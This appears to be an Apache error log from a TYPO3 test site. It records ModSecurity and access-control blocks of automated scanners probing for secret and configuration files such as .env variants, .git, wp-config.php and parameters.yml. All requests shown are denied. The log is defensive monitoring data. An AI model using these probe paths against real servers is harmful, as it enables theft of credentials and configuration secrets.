[Sun Oct 26 08:27:50.672499 2025] [authz_core:error] [pid 3769907] [client 45.148.10.165:58166] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Oct 26 08:27:50.790272 2025] [authz_core:error] [pid 3769905] [client 45.148.10.165:58230] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Oct 26 10:03:10.757665 2025] [authz_core:error] [pid 3769907] [client 204.76.203.25:46126] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Wed Oct 29 16:32:29.134682 2025] [authz_core:error] [pid 3845153] [client 85.204.70.112:45090] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/license.txt
[Wed Oct 29 17:59:07.726995 2025] [authz_core:error] [pid 3845156] [client 98.93.218.180:39446] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Oct 29 18:11:37.265692 2025] [authz_core:error] [pid 3845156] [client 98.93.218.180:48226] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Nov 05 10:38:09.276418 2025] [:error] [pid 4021993] [client 38.114.123.26:33008] [client 38.114.123.26] ModSecurity: Warning. Matched phrase "parameters.yml" at ARGS:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: parameters.yml found within ARGS:file: app/config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aQsbASq5nOUZeTicvU71AwAAAAc"]
[Wed Nov 05 10:38:09.278136 2025] [:error] [pid 4021993] [client 38.114.123.26:33008] [client 38.114.123.26] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aQsbASq5nOUZeTicvU71AwAAAAc"]
[Wed Nov 05 10:38:09.278312 2025] [:error] [pid 4021993] [client 38.114.123.26:33008] [client 38.114.123.26] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aQsbASq5nOUZeTicvU71AwAAAAc"]
[Wed Nov 05 14:07:47.995852 2025] [:error] [pid 4021993] [client 176.65.148.212:54580] [client 176.65.148.212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQtMIyq5nOUZeTicvU71MAAAAAc"]
[Wed Nov 05 14:07:47.996144 2025] [:error] [pid 4021993] [client 176.65.148.212:54580] [client 176.65.148.212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQtMIyq5nOUZeTicvU71MAAAAAc"]
[Wed Nov 05 14:07:47.996335 2025] [:error] [pid 4021993] [client 176.65.148.212:54580] [client 176.65.148.212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQtMIyq5nOUZeTicvU71MAAAAAc"]
[Fri Nov 07 11:10:18.073636 2025] [authz_core:error] [pid 4071233] [client 161.118.199.184:52933] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-includes
[Sat Nov 08 09:34:47.454643 2025] [:error] [pid 4102470] [client 74.176.66.26:17249] [client 74.176.66.26] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "343"] [id "920220"] [msg "URL Encoding Abuse Attack Attempt"] [data "/2%.php"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "surf.test.indacotrentino.com"] [uri "/2%.php"] [unique_id "aQ8Ap9YFt2LkQETpgt37ngAAAAI"]
[Sat Nov 08 09:34:47.915175 2025] [:error] [pid 4102470] [client 74.176.66.26:17249] [client 74.176.66.26] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "343"] [id "920220"] [msg "URL Encoding Abuse Attack Attempt"] [data "/1%.php"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "surf.test.indacotrentino.com"] [uri "/1%.php"] [unique_id "aQ8Ap9YFt2LkQETpgt37nwAAAAI"]
[Sat Nov 08 09:34:49.874370 2025] [:error] [pid 4102470] [client 74.176.66.26:17249] [client 74.176.66.26] ModSecurity: Warning. Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "343"] [id "920220"] [msg "URL Encoding Abuse Attack Attempt"] [data "/0%.php"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "surf.test.indacotrentino.com"] [uri "/0%.php"] [unique_id "aQ8AqdYFt2LkQETpgt37owAAAAI"]
[Sat Nov 08 10:55:45.164513 2025] [authz_core:error] [pid 4095049] [client 204.76.203.25:45416] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Sat Nov 08 11:13:08.965478 2025] [:error] [pid 4095502] [client 176.65.148.212:41142] [client 176.65.148.212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ8XtMRxrFwHjWM9bshfhwAAAAg"]
[Sat Nov 08 11:13:08.965769 2025] [:error] [pid 4095502] [client 176.65.148.212:41142] [client 176.65.148.212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ8XtMRxrFwHjWM9bshfhwAAAAg"]
[Sat Nov 08 11:13:08.965944 2025] [:error] [pid 4095502] [client 176.65.148.212:41142] [client 176.65.148.212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQ8XtMRxrFwHjWM9bshfhwAAAAg"]
[Sun Nov 09 05:10:11.114871 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRAUI51aOg3iu2NUzsHFuQAAAAY"]
[Sun Nov 09 05:10:11.119498 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRAUI51aOg3iu2NUzsHFuQAAAAY"]
[Sun Nov 09 05:10:11.119697 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRAUI51aOg3iu2NUzsHFuQAAAAY"]
[Sun Nov 09 05:10:11.466897 2025] [authz_core:error] [pid 4121478] [client 195.178.110.201:33336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 09 05:10:11.962172 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRAUI51aOg3iu2NUzsHFuwAAAAY"]
[Sun Nov 09 05:10:11.967091 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRAUI51aOg3iu2NUzsHFuwAAAAY"]
[Sun Nov 09 05:10:11.967312 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRAUI51aOg3iu2NUzsHFuwAAAAY"]
[Sun Nov 09 05:10:12.378656 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRAUJJ1aOg3iu2NUzsHFvAAAAAY"]
[Sun Nov 09 05:10:12.383459 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRAUJJ1aOg3iu2NUzsHFvAAAAAY"]
[Sun Nov 09 05:10:12.383653 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRAUJJ1aOg3iu2NUzsHFvAAAAAY"]
[Sun Nov 09 05:10:12.780603 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRAUJJ1aOg3iu2NUzsHFvQAAAAY"]
[Sun Nov 09 05:10:12.785349 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRAUJJ1aOg3iu2NUzsHFvQAAAAY"]
[Sun Nov 09 05:10:12.785556 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRAUJJ1aOg3iu2NUzsHFvQAAAAY"]
[Sun Nov 09 05:10:13.294096 2025] [authz_core:error] [pid 4121478] [client 195.178.110.201:33336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sun Nov 09 05:10:13.803419 2025] [authz_core:error] [pid 4121478] [client 195.178.110.201:33336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 09 05:10:14.206610 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRAUJp1aOg3iu2NUzsHFwAAAAAY"]
[Sun Nov 09 05:10:14.211540 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRAUJp1aOg3iu2NUzsHFwAAAAAY"]
[Sun Nov 09 05:10:14.211754 2025] [:error] [pid 4121478] [client 195.178.110.201:33336] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRAUJp1aOg3iu2NUzsHFwAAAAAY"]
[Sun Nov 09 05:10:14.564032 2025] [authz_core:error] [pid 4121478] [client 195.178.110.201:33336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Sun Nov 09 06:16:57.803519 2025] [:error] [pid 4121445] [client 213.209.157.81:52790] [client 213.209.157.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRAjyb7im4G1XUe_xNheJwAAAAM"]
[Sun Nov 09 06:16:57.803798 2025] [:error] [pid 4121445] [client 213.209.157.81:52790] [client 213.209.157.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRAjyb7im4G1XUe_xNheJwAAAAM"]
[Sun Nov 09 06:16:57.803963 2025] [:error] [pid 4121445] [client 213.209.157.81:52790] [client 213.209.157.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRAjyb7im4G1XUe_xNheJwAAAAM"]
[Sun Nov 09 06:17:15.210566 2025] [authz_core:error] [pid 4121476] [client 213.209.157.81:54766] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 09 07:12:00.352196 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRAwsL7im4G1XUe_xNheLAAAAAM"]
[Sun Nov 09 07:12:00.354001 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRAwsL7im4G1XUe_xNheLAAAAAM"]
[Sun Nov 09 07:12:00.354222 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRAwsL7im4G1XUe_xNheLAAAAAM"]
[Sun Nov 09 07:12:00.650089 2025] [authz_core:error] [pid 4121445] [client 93.123.109.132:40598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 09 07:12:00.982134 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRAwsL7im4G1XUe_xNheLgAAAAM"]
[Sun Nov 09 07:12:00.983824 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRAwsL7im4G1XUe_xNheLgAAAAM"]
[Sun Nov 09 07:12:00.984043 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRAwsL7im4G1XUe_xNheLgAAAAM"]
[Sun Nov 09 07:12:01.561632 2025] [:error] [pid 4121445] [client 93.123.109.132:40598] [client 93.123.109.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRAwsb7im4G1XUe_xNheLwAAAAM"]
